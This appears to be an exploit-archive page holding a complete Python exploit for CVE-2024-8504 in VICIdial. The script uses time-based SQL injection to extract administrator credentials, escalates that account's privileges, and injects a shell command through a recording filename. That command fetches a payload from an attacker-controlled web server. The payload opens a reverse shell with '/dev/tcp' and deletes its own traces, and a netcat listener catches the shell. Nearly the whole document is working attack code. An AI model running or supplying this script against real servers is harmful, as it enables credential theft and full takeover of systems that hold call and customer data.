4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import os
import re
import socket
import string
import random
import urllib3
import argparse
import requests
import threading
import rich_click as click

from faker import Faker
from base64 import b64encode
from datetime import datetime
from bs4 import BeautifulSoup
from urllib.parse import urlparse

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class Exploit:
    def __init__(
        self, url, whost, wport, lhost=None, lport=None, bind=False, proxy=None
    ):
        """
        This 'sleep' duration is derived by the average response time
        multiplied by this value. A server with an average response time
        of 10ms is given a 'sleep' duration of 300ms. Tune as needed.
        """
        self.SLEEP_MULTIPLIER = 4

        self.fake = Faker()
        self.REQUEST_HEADERS = {"User-Agent": self.fake.user_agent()}
        self.ALLOWED_SCHEMES = ["http", "https"]

        if proxy:
            self.REQUEST_PROXIES = {"http": proxy, "https": proxy}
        else:
            self.REQUEST_PROXIES = {}

        self.TARGET_URL = url

        # Resolve the domain to IP and replace in the URL
        self.replace_domain_with_ip()

        # Get the IP from the resolved URL
        self.TARGET_IP = urlparse(self.TARGET_URL).hostname

        self.PAYLOAD_WEBSERVER_HOST = whost
        self.PAYLOAD_WEBSERVER_PORT = wport

        self.REVERSE_SHELL_HOST = lhost
        self.REVERSE_SHELL_PORT = lport

        self.BIND = bind

        self.VICIDIAL_FINGERPRINT = "Please Hold while I redirect you!"
        self.RANDOM_CHARSET = string.ascii_uppercase + string.digits

        self.CAMPAIGN_ID = "".join(random.choices(string.digits, k=6))
        self.LIST_ID = str(int(self.CAMPAIGN_ID) + 1)

        self.MALICIOUS_FILENAME = "." + "".join(
            random.choices(string.ascii_lowercase + string.digits, k=4)
        )

        self.COMPANY_NAME = (
            self.fake.company().title()
            + " "
            + random.choice(
                [
                    "Dial",
                    "Inbound",
                    "Call",
                    "Shift",
                    "Support",
                    "Sales",
                    "Outbound",
                    "Admin",
                    "Helpdesk",
                    "Queue",
                    "Agent",
                    "Service",
                    "Tech",
                    "Monitoring",
                    "Operations",
                    "Logistics",
                    "Manager",
                ]
            )
        )

    def custom_print(self, message: str, header: str) -> None:
        """
        Prints a message with a colored header to indicate the message type.
        """
        header_colors = {
            "+": "green",
            "-": "red",
            "!": "yellow",
            "*": "blue",
            "~": "magenta",
        }
        header_color = header_colors.get(header, "white")
        formatted_message = click.style(
            f"[{header}] ", fg=header_color, bold=True
        ) + click.style(f"{message}", bold=True, fg="white")
        click.echo(formatted_message)

    # returns a session object with custom proxies/headers if supplied
    def build_requests_session(self):
        session = requests.Session()
        session.proxies = self.REQUEST_PROXIES
        session.verify = False
        return session

    # returns a random string of a given length
    def random(self, length):
        return "".join(random.choice(self.RANDOM_CHARSET) for _ in range(length))

    # returns a timedelta representing the response time of an injected SQL query
    def time_sql_query(self, query, session):
        username = f"goolicker', '', ({query}));# "
        credentials = f"{username}:password"
        credentials_base64 = b64encode(credentials.encode()).decode()
        auth_header = f"Basic {credentials_base64}"

        target_uri = f"{self.TARGET_URL}/VERM/VERM_AJAX_functions.php"
        request_params = {
            "function": "log_custom_report",
            self.random(5): self.random(5),
        }
        request_headers = {**self.REQUEST_HEADERS, "Authorization": auth_header}

        response = session.get(
            target_uri, params=request_params, headers=request_headers
        )
        return response.elapsed

    # returns a boolean if time-based SQL injection is possible, additionally
    # sets the best 'sleep' duration based on response times
    def is_vulnerable(self, session, baseline_iterations=5):
        # determine average baseline response time
        zero_sleep_query = f"SELECT (NULL)"
        total_baseline_time = 0
        for _ in range(baseline_iterations):
            execution_time = self.time_sql_query(zero_sleep_query, session)
            total_baseline_time += execution_time.total_seconds()

        average_baseline_response_time = total_baseline_time / baseline_iterations
        self.sql_baseline_time = average_baseline_response_time

        # determine if injected sleep query impacts response time
        sleep_length = round(average_baseline_response_time * self.SLEEP_MULTIPLIER, 2)
        sleep_query = f"SELECT (sleep({sleep_length}))"
        execution_time = self.time_sql_query(sleep_query, session)
        if execution_time.total_seconds() >= sleep_length:
            self.sql_sleep_length = sleep_length
            return True
        else:
            return False

    # determine if a character at a specific indice of a query result returns a
    # boolean 'true' when compared to a given character using the supplied operator
    def check_indice_of_query_result(self, session, query, indice, operator, ordinal):

        parent_query = f"SELECT IF(ORD((SUBSTRING(({query}), {indice}, {indice}))){operator}{ordinal}, sleep({self.sql_sleep_length}), null)"

        execution_time = self.time_sql_query(parent_query, session)
        return execution_time.total_seconds() >= (
            self.sql_baseline_time * self.SLEEP_MULTIPLIER
        )

    def enumerate_sql_query(
        self, session, query="SELECT @@version", charset=string.printable
    ):
        # convert charset to ordinals
        all_characters = sorted([ord(char) for char in charset])
        reduced_characters = all_characters

        # use a binary search and enumerate query results
        result = ""
        indice = 1
        indice_could_be_null = True
        while True:
            """
            we check if the value is NULL once per indice
            to determine when a string ends. this adds one
            request per indice, but since every boolean 'true'
            results in a delay this is faster than counting
            the length of the string before enumrating.
            """
            if indice_could_be_null:
                if self.check_indice_of_query_result(session, query, indice, "=", "0"):
                    break
                else:
                    indice_could_be_null = False

            # enumerate each character of query result with a binary search
            middle_indice = len(reduced_characters) // 2
            middle_ordinal = reduced_characters[middle_indice]
            if self.check_indice_of_query_result(
                session, query, indice, "<=", middle_ordinal
            ):
                if self.check_indice_of_query_result(
                    session, query, indice, "=", middle_ordinal
                ):
                    reduced_characters = all_characters
                    result += chr(middle_ordinal)
                    indice += 1
                    indice_could_be_null = True
                    self.custom_print(result, "*")
                else:
                    reduced_characters = reduced_characters[:middle_indice]
            else:
                reduced_characters = reduced_characters[middle_indice:]

        return result

    def get_dynamic_fields(self, session, username, password):
        # Creates the POST request body to retrieve dynamic fields

        vdc_db_query_body = {
            "user": username,
            "pass": password,
            "ACTION": "LogiNCamPaigns",
            "format": "html",
        }

        try:
            # Sends the POST request to /agc/vdc_db_query.php
            response = session.post(
                f"{self.TARGET_URL}/agc/vdc_db_query.php", data=vdc_db_query_body
            )

            if not response or response.status_code != 200:
                self.custom_print("Failed to retrieve hidden input fields", "-")
                return None, None

            # Parses the HTML response to retrieve the hidden input fields
            soup = BeautifulSoup(response.text, "html.parser")
            mgr_login_name = soup.find("input", {"name": re.compile(r"^MGR_login")})
            mgr_pass_name = soup.find("input", {"name": re.compile(r"^MGR_pass")})

            # Ensure both fields are retrieved
            if not mgr_login_name or not mgr_pass_name:
                self.custom_print(
                    "Could not find the required dynamic fields, constructing manually",
                    "!",
                )

                # Get today's date in the required format (YYYYMMDD)
                today_date = datetime.now().strftime("%Y%m%d")

                # Manually construct the dynamic field names
                mgr_login_name = f"MGR_login{today_date}"
                mgr_pass_name = f"MGR_pass{today_date}"

                self.custom_print(
                    f"Manually constructed dynamic field names: {mgr_login_name}, {mgr_pass_name}",
                    "+",
                )
            else:
                mgr_login_name = mgr_login_name["name"]
                mgr_pass_name = mgr_pass_name["name"]

                self.custom_print(
                    f"Retrieved dynamic field names: {mgr_login_name}, {mgr_pass_name}",
                    "+",
                )

            return mgr_login_name, mgr_pass_name

        except Exception as e:
            self.custom_print(f"An error occurred: {str(e)}", "-")
            return None, None

    def resolve_domain_to_ip(self, url):
        """Resolves a domain name to an IP address"""
        try:
            parsed_url = urlparse(url)
            domain = parsed_url.hostname
            if re.match(r"\d+\.\d+\.\d+\.\d+", domain):
                return domain
            ip_address = socket.gethostbyname(domain)
            return ip_address
        except socket.gaierror as e:
            raise ValueError(f"Error resolving domain: {str(e)}")

    def replace_domain_with_ip(self):
        """Replaces the domain in the TARGET_URL with its resolved IP address"""
        ip_address = self.resolve_domain_to_ip(self.TARGET_URL)
        self.TARGET_URL = self.TARGET_URL.replace(
            urlparse(self.TARGET_URL).hostname, ip_address
        )

    def poison_recording_files(self, session, username, password):
        try:
            # authenticate using administrator credentials
            credentials = f"{username}:{password}"
            credentials_base64 = b64encode(credentials.encode()).decode()
            auth_header = f"Basic {credentials_base64}"

            target_uri = f"{self.TARGET_URL}/vicidial/admin.php"
            request_params = {"ADD": "3", "user": username}
            request_headers = {**self.REQUEST_HEADERS, "Authorization": auth_header}

            response = session.get(
                target_uri, params=request_params, headers=request_headers
            )
            if response.status_code == 200:
                self.custom_print(
                    f'Authenticated successfully as user "{username}"', "+"
                )
            else:
                self.custom_print(
                    "Failed to authenticate with credentials. Maybe hashing is enabled?",
                    "-",
                )
                return False

            # update user settings to increase privileges beyond default administrator
            user_settings_body = {
                "ADD": "4A",
                "user": username,
                "DB": "0",
                "pass": password,
                "force_change_password": "N",
                "full_name": self.fake.name(),
                "user_level": "9",
                "user_group": "ADMIN",
                "phone_login": self.fake.user_name(),
                "phone_pass": self.fake.password(),
                "active": "Y",
                "user_new_lead_limit": "-1",
                "agent_choose_ingroups": "1",
                "agent_choose_blended": "1",
                "scheduled_callbacks": "1",
                "vicidial_recording": "1",
                "vicidial_transfers": "1",
                "selected_language": "default+English",
                "agent_shift_enforcement_override": "ALL",
                "agent_call_log_view_override": "Y",
                "hide_call_log_info": "Y",
                "lead_filter_id": "NONE",
                "max_inbound_filter_min_sec": "-1",
                "inbound_credits": "-1",
                "wrapup_seconds_override": "-1",
                "ready_max_logout": "-1",
                "GRADE_AGENTDIRECT": "10",
                "LIMIT_AGENTDIRECT": "-1",
                "GRADE_AGENTDIRECT_CHAT": "10",
                "LIMIT_AGENTDIRECT_CHAT": "-1",
                "qc_user_level": "1",
                "view_reports": "1",
                "alter_agent_interface_options": "1",
                "modify_users": "1",
                "change_agent_campaign": "1",
                "delete_users": "1",
                "modify_usergroups": "1",
                "delete_user_groups": "1",
                "modify_lists": "1",
                "delete_lists": "1",
                "load_leads": "1",
                "modify_leads": "1",
                "download_lists": "1",
                "export_reports": "1",
                "delete_from_dnc": "1",
                "modify_campaigns": "1",
                "campaign_detail": "1",
                "modify_dial_prefix": "1",
                "delete_campaigns": "1",
                "modify_ingroups": "1",
                "delete_ingroups": "1",
                "modify_inbound_dids": "1",
                "delete_inbound_dids": "1",
                "modify_custom_dialplans": "1",
                "modify_remoteagents": "1",
                "delete_remote_agents": "1",
                "modify_scripts": "1",
                "delete_scripts": "1",
                "modify_filters": "1",
                "delete_filters": "1",
                "ast_admin_access": "1",
                "ast_delete_phones": "1",
                "modify_call_times": "1",
                "delete_call_times": "1",
                "modify_servers": "1",
                "modify_shifts": "1",
                "modify_phones": "1",
                "modify_carriers": "1",
                "modify_labels": "1",
                "modify_colors": "1",
                "modify_statuses": "1",
                "modify_voicemail": "1",
                "modify_audiostore": "1",
                "modify_moh": "1",
                "modify_tts": "1",
                "modify_contacts": "1",
                "callcard_admin": "1",
                "add_timeclock_log": "1",
                "modify_timeclock_log": "1",
                "delete_timeclock_log": "1",
                "manager_shift_enforcement_override": "1",
                "pause_code_approval": "1",
                "vdc_agent_api_access": "1",
                "api_allowed_functions%5B%5D": "ALL_FUNCTIONS",
                "modify_same_user_level": "1",
                "download_invalid_files": "1",
                "alter_admin_interface_options": "1",
                "SUBMIT": "SUBMIT",
            }
            response = session.post(
                target_uri, headers=request_headers, data=user_settings_body
            )
            self.custom_print("Updated user settings to increase privileges", "+")

            # update system settings without clobbering existing configuration
            response = session.get(
                target_uri, headers=request_headers, params={"ADD": "311111111111111"}
            )
            soup = BeautifulSoup(response.text, "html.parser")
            form_tag = soup.find("form")
            system_settings_body = {}
            for input_tag in form_tag.find_all("input"):
                setting_name = input_tag["name"]
                setting_value = input_tag["value"]
                system_settings_body[setting_name] = setting_value

            for select_tag in form_tag.find_all("select"):
                setting_name = select_tag["name"]
                selected_tag = select_tag.find("option", selected=True)
                if not selected_tag:
                    continue
                setting_value = selected_tag.text
                system_settings_body[setting_name] = setting_value

            system_settings_body["outbound_autodial_active"] = "0"
            response = session.post(
                target_uri, headers=request_headers, data=system_settings_body
            )
            self.custom_print("Updated system settings", "+")

            # create dummy campaign
            campaign_settings_body = {
                "ADD": "21",
                "campaign_id": self.CAMPAIGN_ID,
                "campaign_name": f"{self.COMPANY_NAME}",
                "user_group": "---ALL---",
                "active": "Y",
                "allow_closers": "Y",
                "hopper_level": "1",
                "next_agent_call": "random",
                "local_call_time": "12am-11pm",
                "get_call_launch": "NONE",
                "SUBMIT": "SUBMIT",
            }
            response = session.post(
                target_uri, headers=request_headers, data=campaign_settings_body
            )
            self.custom_print(f'Created dummy campaign "{self.COMPANY_NAME}"', "+")

            # update dummy campaign
            update_campaign_body = {
                "ADD": "41",
                "campaign_id": self.CAMPAIGN_ID,
                "old_campaign_allow_inbound": "Y",
                "campaign_name": f"{self.COMPANY_NAME}",
                "active": "Y",
                "lead_order": "DOWN",
                "lead_filter_id": "NONE",
                "no_hopper_leads_logins": "Y",
                "hopper_level": "1",
                "reset_hopper": "N",
                "dial_method": "RATIO",
                "auto_dial_level": "1",
                "SUBMIT": "SUBMIT",
                "form_end": "END",
            }
            response = session.post(
                target_uri, headers=request_headers, data=update_campaign_body
            )
            self.custom_print("Updated dummy campaign settings", "+")

            # create dummy list
            list_settings_body = {
                "ADD": "211",
                "list_id": self.LIST_ID,
                "list_name": f"{self.COMPANY_NAME}_list",
                "campaign_id": self.CAMPAIGN_ID,
                "active": "Y",
                "SUBMIT": "SUBMIT",
            }
            response = session.post(
                target_uri, headers=request_headers, data=list_settings_body
            )
            self.custom_print("Created dummy list for campaign", "+")

            # fetch credentials for a phone login
            try:
                response = session.get(
                    target_uri, headers=request_headers, params={"ADD": "10000000000"}
                )
                phone_uri_path = BeautifulSoup(response.text, "html.parser").find(
                    "a", string="MODIFY"
                )["href"]

                response = session.get(
                    f"{self.TARGET_URL}{phone_uri_path}", headers=request_headers
                )
                soup = BeautifulSoup(response.text, "html.parser")

                phone_extension = soup.find("input", {"name": "extension"})["value"]
                phone_password = soup.find("input", {"name": "pass"})["value"]
                recording_extension = soup.find("input", {"name": "recording_exten"})[
                    "value"
                ]

                self.custom_print(
                    f"Found phone credentials: {phone_extension}:{phone_password}", "+"
                )

            except Exception as e:
                self.custom_print(f"Error retrieving phone credentials: {str(e)}", "-")
                return False

            # authenticate to agent portal with phone credentials
            mgr_login_name, mgr_pass_name = self.get_dynamic_fields(
                session, username, password
            )

            if not all([mgr_login_name, mgr_pass_name]):
                return False

            # authenticate to agent portal with phone credentials
            manager_login_body = {
                "DB": "0",
                "JS_browser_height": "1313",
                "JS_browser_width": "2560",
                "phone_login": phone_extension,
                "phone_pass": phone_password,
                "VD_login": username,
                "VD_pass": password,
                "MGR_override": "1",
                "relogin": "YES",
                "VD_login": username,
                "VD_pass": password,
                mgr_login_name: username,
                mgr_pass_name: password,
                "SUBMIT": "SUBMIT",
            }

            response = session.post(
                f"{self.TARGET_URL}/agc/vicidial.php",
                headers=request_headers,
                data=manager_login_body,
            )
            self.custom_print(
                f'Entered "manager" credentials to override shift enforcement', "+"
            )

            agent_login_body = {
                "DB": "0",
                "JS_browser_height": "1313",
                "JS_browser_width": "2560",
                "phone_login": phone_extension,
                "phone_pass": phone_password,
                "VD_login": username,
                "VD_pass": password,
                "VD_campaign": self.CAMPAIGN_ID,
            }
            response = session.post(
                f"{self.TARGET_URL}/agc/vicidial.php",
                headers=request_headers,
                data=agent_login_body,
            )

            self.custom_print(f"Authenticated as agent using phone credentials", "+")

            try:
                malicious_filename = f"$(curl$IFS@{self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}$IFS-o$IFS{self.MALICIOUS_FILENAME}&&bash$IFS{self.MALICIOUS_FILENAME})"
                session_name = re.findall(
                    r"var session_name = '([a-zA-Z0-9_]+?)';", response.text
                )[0]
                session_id = re.findall(
                    r"var session_id = '([0-9]+?)';", response.text
                )[0]

                self.custom_print(
                    f"Session Name: {session_name}, Session ID: {session_id}", "+"
                )

            except Exception as e:
                self.custom_print(
                    f"Error retrieving session_name or session_id: {str(e)}", "-"
                )
                return False

            record1_body = {
                "server_ip": self.TARGET_IP,
                "session_name": session_name,
                "user": username,
                "pass": password,
                "ACTION": "MonitorConf",
                "format": "text",
                "channel": f"Local/{recording_extension}@default",
                "filename": malicious_filename,
                "exten": recording_extension,
                "ext_context": "default",
                "ext_priority": "1",
                "FROMvdc": "YES",
            }
            try:
                response = session.post(
                    f"{self.TARGET_URL}/agc/manager_send.php",
                    headers=request_headers,
                    data=record1_body,
                )

                recording_id_match = re.findall(
                    r"RecorDing_ID: ([0-9]+)", response.text
                )
                if not recording_id_match:
                    raise ValueError(
                        "Failed to retrieve RecorDing_ID from the response."
                    )

                recording_id = recording_id_match[0]
                self.custom_print(
                    f"Recording ID: {recording_id} retrieved successfully", "+"
                )
                self.custom_print(response.text, "~")

            except Exception as e:
                self.custom_print(f"Error retrieving RecorDing_ID: {str(e)}", "-")
                return False

            # stop malicious recording to prevent file size from growing
            record2_body = {
                "server_ip": self.TARGET_IP,
                "session_name": session_name,
                "user": username,
                "pass": password,
                "ACTION": "StopMonitorConf",
                "format": "text",
                "channel": f"Local/{recording_extension}@default",
                "filename": f"ID:{recording_id}",
                "exten": session_id,
                "ext_context": "default",
                "ext_priority": "1",
                "FROMvdc": "YES",
            }

            response = session.post(
                f"{self.TARGET_URL}/agc/conf_exten_check.php",
                headers=request_headers,
                data=record2_body,
            )

            return True

        except Exception as e:
            self.custom_print(f"An error occurred during exploitation: {str(e)}", "-")

        finally:
            # Always delete the campaign, regardless of success or failure
            self.custom_print(
                f"Deleting campaign '{self.COMPANY_NAME}' with ID {self.CAMPAIGN_ID}",
                "*",
            )
            try:
                session.get(
                    f"{self.TARGET_URL}/vicidial/admin.php?ADD=61&campaign_id={self.CAMPAIGN_ID}&CoNfIrM=YES",
                    headers=request_headers,
                )
                self.custom_print("Campaign deleted successfully.", "+")
            except Exception as delete_exception:
                self.custom_print(
                    f"Failed to delete campaign: {str(delete_exception)}", "-"
                )

    # returns administrator username and password by
    # exploiting time-based SQL injection.
    def extract_admin_credentials(self, session):
        self.custom_print("Enumerating administrator credentials", "*")
        username_charset = string.ascii_letters + string.digits

        admin_username_query = "SELECT user FROM vicidial_users WHERE user_level = 9 AND modify_same_user_level = '1' LIMIT 1"

        admin_username = self.enumerate_sql_query(
            session, admin_username_query, username_charset
        )
        self.custom_print(f"Username: {admin_username}", "+")

        password_charset = string.ascii_letters + string.digits + "-.+/=_"
        admin_password_query = (
            f"SELECT pass FROM vicidial_users WHERE user = '{admin_username}' LIMIT 1"
        )
        admin_password = self.enumerate_sql_query(
            session, admin_password_query, password_charset
        )
        self.custom_print(f"Password: {admin_password}", "+")

        return admin_username, admin_password

    # emulates a webserver to deliver exploit script
    # Webserver function that closes once contacted
    def payload_webserver(self):
        try:
            server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            server.bind((self.PAYLOAD_WEBSERVER_HOST, int(self.PAYLOAD_WEBSERVER_PORT)))
            server.listen(1)

            self.custom_print(
                f"Webserver started at {self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}",
                "*",
            )

            client, incoming_address = server.accept()
            message = client.recv(100)

            if b"User-Agent: curl" in message:
                self.custom_print(
                    f"Received cURL request from {incoming_address[0]}", "+"
                )
                exploit_script = (
                    f"#!/bin/bash\n"
                    f"rm {self.MALICIOUS_FILENAME} /var/spool/asterisk/monitor/*curl*\n"
                    f"bash -i >& /dev/tcp/{self.REVERSE_SHELL_HOST}/{self.REVERSE_SHELL_PORT} 0>&1\n"
                )

                http_response = f"HTTP/1.1 200 OK\r\n"
                http_response += f"Content-Length: {len(exploit_script)}\r\n\r\n"

                http_response += exploit_script
                client.sendall(http_response.encode())

            client.close()
            server.close()

        except Exception as e:
            self.custom_print(f"Error in webserver: {str(e)}", "-")

    def start_listener(self):
        try:
            self.custom_print(
                f"Starting Netcat listener on port {self.REVERSE_SHELL_PORT}", "*"
            )
            os.system(f"nc -lvnp {self.REVERSE_SHELL_PORT}")
        except Exception as e:
            self.custom_print(f"Error while starting Netcat listener: {str(e)}", "-")

    # Binds to provided addresses and handles incoming connections
    def prepare_listeners(self):
        try:
            webserver = threading.Thread(target=self.payload_webserver)
            listener = threading.Thread(target=self.start_listener)

            self.custom_print("Listening for incoming connections...", "*")

            webserver.start()
            listener.start()

            listener.join()
            webserver.join()

        except Exception as e:
            self.custom_print(f"Error while setting up listeners: {str(e)}", "-")

    def perform_sqli(self):
        session = self.build_requests_session()
        is_vulnerable = self.is_vulnerable(session)
        if is_vulnerable:
            self.custom_print(
                "Target appears vulnerable to time-based SQL injection", "+"
            )
        else:
            self.custom_print("Failed to perform time-based SQL injection", "-")
            return None, None

        username, password = self.extract_admin_credentials(session)

        return username, password


def print_banner():
    banner = """
        =============================================
        |           EXPLOIT CVE-2024-8504           |
        |     Unauthenticated SQLi to RCE Exploit   |
        |            Found by:  KoreLogic           |
        |           Modded by:  Chocapikk           |
        =============================================

        SQLi Command:
        python exploit.py -u https://example.org

        RCE Command (Authenticated):
        python exploit.py -b -u https://example.org \\
            -wh <webserver IP> -wp <webserver port> \\
            -lh <your IP> -lp <your listener port>  \\
            -un <admin username> -pw <admin password>
        
        =============================================
    """
    click.echo(click.style(banner, fg="cyan", bold=True))


if __name__ == "__main__":
    print_banner()
    argparser = argparse.ArgumentParser(
        description="Exploit for CVE-2024-8504: Unauthenticated SQLi to retrieve credentials or RCE as root"
    )
    required = argparser.add_argument_group("Required Arguments")
    optional = argparser.add_argument_group("Optional Arguments")

    required.add_argument(
        "-u",
        "--url",
        required=True,
        help="Vicidial Server URL (e.g., https://example.com:443)",
    )

    optional.add_argument(
        "-wh", "--whost", required=False, help="Malicious webserver IP address"
    )
    optional.add_argument(
        "-wp", "--wport", required=False, help="Malicious webserver port number"
    )

    optional.add_argument(
        "-lh", "--lhost", required=False, help="Reverse shell listener IP address"
    )
    optional.add_argument(
        "-lp", "--lport", required=False, help="Reverse shell listener port number"
    )

    optional.add_argument(
        "-un",
        "--username",
        required=False,
        help="Vicidial admin username if already known",
    )
    optional.add_argument(
        "-pw",
        "--password",
        required=False,
        help="Vicidial admin password if already known",
    )

    optional.add_argument(
        "-b",
        "--bind",
        required=False,
        help="Bind to [lhost:lport] and [whost:wport] and handle connections automatically",
        action="store_true",
        default=False,
    )
    optional.add_argument(
        "-p",
        "--proxy",
        required=False,
        help="HTTP[S] proxy to use for outbound requests",
        default=None,
    )

    arguments = argparser.parse_args()

    if arguments.bind and (not arguments.whost or not arguments.wport):
        print("Error: --whost and --wport are required when using --bind.")
        exit(1)

    exploit = Exploit(
        url=arguments.url,
        whost=arguments.whost,
        wport=arguments.wport,
        lhost=arguments.lhost,
        lport=arguments.lport,
        bind=arguments.bind,
        proxy=arguments.proxy,
    )

    session = exploit.build_requests_session()

    if arguments.username and arguments.password:
        exploit.custom_print("Using provided credentials for exploitation...", "*")
        exploited = exploit.poison_recording_files(
            session, arguments.username, arguments.password
        )

        if arguments.bind and exploited:
            exploit.prepare_listeners()

    else:
        exploit.custom_print(
            "Attempting SQLi exploitation to retrieve credentials...", "*"
        )
        username, password = exploit.perform_sqli()

        if username and password:
            exploit.custom_print(
                f"SQLi successful: Username: {username}, Password: {password}", "+"
            )
        else:
            exploit.custom_print("SQLi failed, no credentials retrieved.", "-")